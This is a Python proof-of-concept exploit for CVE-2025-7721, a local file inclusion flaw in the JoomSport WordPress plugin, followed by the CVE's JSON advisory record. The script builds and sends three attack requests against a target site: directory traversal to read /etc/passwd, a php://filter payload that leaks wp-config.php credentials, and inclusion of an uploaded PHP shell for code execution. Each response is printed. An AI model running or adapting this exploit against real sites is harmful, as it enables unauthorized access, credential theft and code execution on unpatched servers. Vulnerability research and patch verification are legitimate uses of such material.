CVE-2025-7721

# CVE-2025-7721 - JoomSport LFI PoC # Vulnerability: Local File Inclusion via 'task' parameter # Affected: JoomSport plugin <= 5.7.3 import requests # Target WordPress site with JoomSport plugin installed target_url = "http://target-wordpress-site.com" # The vulnerable endpoint is in the sportleague/base/wordpress/classes/class-jsport-controller.php # The 'task' parameter is used for file inclusion without proper validation # Exploit 1: Local File Inclusion using directory traversal payload_traversal = "../../../../../../../etc/passwd" lfi_url_traversal = f"{target_url}/wp-content/plugins/joomsport-sports-league-results-management/sportleague/base/wordpress/classes/class-jsport-controller.php?task={payload_traversal}" # Exploit 2: PHP filter to read source code (base64 encoded) payload_filter = "php://filter/convert.base64-encode/resource=../../../../wp-config.php" lfi_url_filter = f"{target_url}/wp-content/plugins/joomsport-sports-league-results-management/sportleague/base/wordpress/classes/class-jsport-controller.php?task={payload_filter}" # Exploit 3: Include a previously uploaded PHP shell (if file upload is available) payload_rce = "../../../../uploads/malicious_shell.php" lfi_url_rce = f"{target_url}/wp-content/plugins/joomsport-sports-league-results-management/sportleague/base/wordpress/classes/class-jsport-controller.php?task={payload_rce}" def exploit_lfi(url, description): """Send the LFI exploit request""" print(f"[*] Attempting: {description}") print(f"[*] URL: {url}") try: response = requests.get(url, timeout=10) print(f"[*] Status Code: {response.status_code}") print(f"[*] Response Length: {len(response.text)}") print(f"[*] Response Preview: {response.text[:500]}") return response except requests.exceptions.RequestException as e: print(f"[!] Error: {e}") return None # Execute exploits print("=" * 60) print("CVE-2025-7721 - JoomSport LFI Exploit") print("=" * 60) exploit_lfi(lfi_url_traversal, "Directory Traversal LFI") print() exploit_lfi(lfi_url_filter, "PHP Filter LFI (Base64)") print() exploit_lfi(lfi_url_rce, "RCE via uploaded PHP shell")

{"cve": {"id": "CVE-2025-7721", "sourceIdentifier": "[email protected]", "published": "2025-10-03T12:15:44.640", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The JoomSport – for Sports: Team & League, Football, Hockey & more plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 5.7.3 via the task parameter. This makes it possible for unauthenticated attackers to include and execute arbitrary .php files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where .php file types can be uploaded and included."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-98"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/joomsport-sports-league-results-management/trunk/sportleague/base/wordpress/classes/class-jsport-controller.php#L74", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset/3371353/", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/4f3900c7-2acb-4031-9854-b0b13e172e1f?source=cve", "source": "[email protected]"}]}}